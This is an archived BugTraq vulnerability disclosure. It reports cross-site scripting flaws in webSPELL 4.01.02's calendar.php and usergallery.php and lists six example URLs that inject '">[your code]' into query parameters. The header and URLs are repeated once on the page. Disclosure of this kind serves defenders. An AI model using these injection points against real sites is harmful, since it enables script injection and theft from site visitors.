BugTraq
Back to list
|
Post reply
webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability
Dec 08 2007 10:53PM
brainheadbrainhead gmx de
###################
Autor: Brainhead
Type: XSS
Version: 4.01.02
Files: usergallery.php, calendar.php
Magic Quotes :off
###################
Examples:
http://site.tld/[PATH]/index.php?site=usergallery&action=upload&galleryI
D=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&upID=">[y
our code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&tag=">[yo
ur code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&month=">[
your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&userID=">
[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&year=">[y
our code]
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Autor: Brainhead
Type: XSS
Version: 4.01.02
Files: usergallery.php, calendar.php
Magic Quotes :off
###################
Examples:
http://site.tld/[PATH]/index.php?site=usergallery&action=upload&galleryI
D=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&upID=">[y
our code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&tag=">[yo
ur code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&month=">[
your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&userID=">
[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&year=">[y
our code]
[ reply ]